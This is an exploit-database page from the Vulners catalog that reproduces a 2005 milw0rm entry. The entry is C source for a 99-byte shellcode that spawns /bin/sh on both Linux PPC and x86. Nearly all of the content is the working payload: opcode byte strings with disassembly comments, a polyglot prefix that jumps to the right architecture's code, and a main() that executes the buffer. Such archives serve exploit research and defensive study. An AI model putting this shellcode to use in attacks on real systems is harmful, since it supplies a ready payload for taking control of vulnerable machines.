Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

linux/PPC/x86 execve"/bin/sh",{"/bin/sh",NULL},NULL 99 bytes

🗓️ 15 Nov 2005 00:00:00Reported by Charles StevensonType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 47 Views

linux/PPC/x86 execve"/bin/sh",{"/bin/sh",NULL},NULL 99 byte

Code
/*
 * -[ dual-linux.c ]-
 * by [email protected] (ripped from [email protected])
 *                     ^-- much <3 brotha ;)
 *
 * execve("/bin/sh",{"/bin/sh",NULL},NULL) shellcode for linux (both the ppc
 * and x86 version.) I thought about adding mipsel but I don't feel up to it
 * at the moment.  In fact I feel like crap...
 *
 * Shoutz to nemo, andrewg, KF, ghandi, phased, MRX, Blue Boar, Solar Eclipse,
 * HDM, FX, Max Vision, MaXx, c0ntex, izik, xort, banned-it, hoglund, SkyLined,
 * Gera, Stealth (7350), Emmanuel, Hackademy, Raptor (0xdeadbeef), sh0k, jduck,
 * xfocus, LSD, ADM, b10z, 0dd, ES, runixd, packy, norse, mXn, thn, dragnet,
 * hdm, fozzy, str0ke, B|ueberry, <S>, rjohnson, Kaliman, capsyl, salvia,
 * amnesia, arcanum, eazyass, loophole, my family and so any others...
 * 
 * irc.pulltheplug.org #social
 *
 * peace ~ metta ~
 *
 * References:
 * http://milw0rm.com/id.php?id=1318
 * http://www.phrack.org/phrack/57/p57-0x0e
 */

char dual_linux[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm   r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"

"\x69\x69\x69\x69"	/*nop*/
"\x69\x69\x69\x69"	/*nop*/
"\x69\x69\x69\x69"	/*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <[email protected]>
"\x7c\x3f\x0b\x78"	/*mr	r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79"	/*xor.	r5,r5,r5*/
"\x42\x40\xff\xf9"	/*bdzl+	10000454<main>*/
"\x7f\x08\x02\xa6"	/*mflr	r24*/
"\x3b\x18\x01\x34"	/*addi	r24,r24,308*/
"\x98\xb8\xfe\xfb"	/*stb	r5,-261(r24)*/
"\x38\x78\xfe\xf4"	/*addi	r3,r24,-268*/
"\x90\x61\xff\xf8"	/*stw	r3,-8(r1)*/
"\x38\x81\xff\xf8"	/*addi	r4,r1,-8*/
"\x90\xa1\xff\xfc"	/*stw	r5,-4(r1)*/
"\x3b\xc0\x01\x60"	/*li	r30,352*/
"\x7f\xc0\x2e\x70"	/*srawi	r0,r30,5*/
"\x44\xde\xad\xf2"	/*.long	0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL

// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <[email protected]>
// Copyright(c) 2005 BaCkSpAcE <[email protected]>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";

int main(int ac, char **av)
{
       void (*fp)() = dual_linux;
       fp();
}

// in loving memory of hack.co.za

// milw0rm.com [2005-11-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Nov 2005 00:00Current
linux ppc x86 execve shellcode exploitayload bytes
47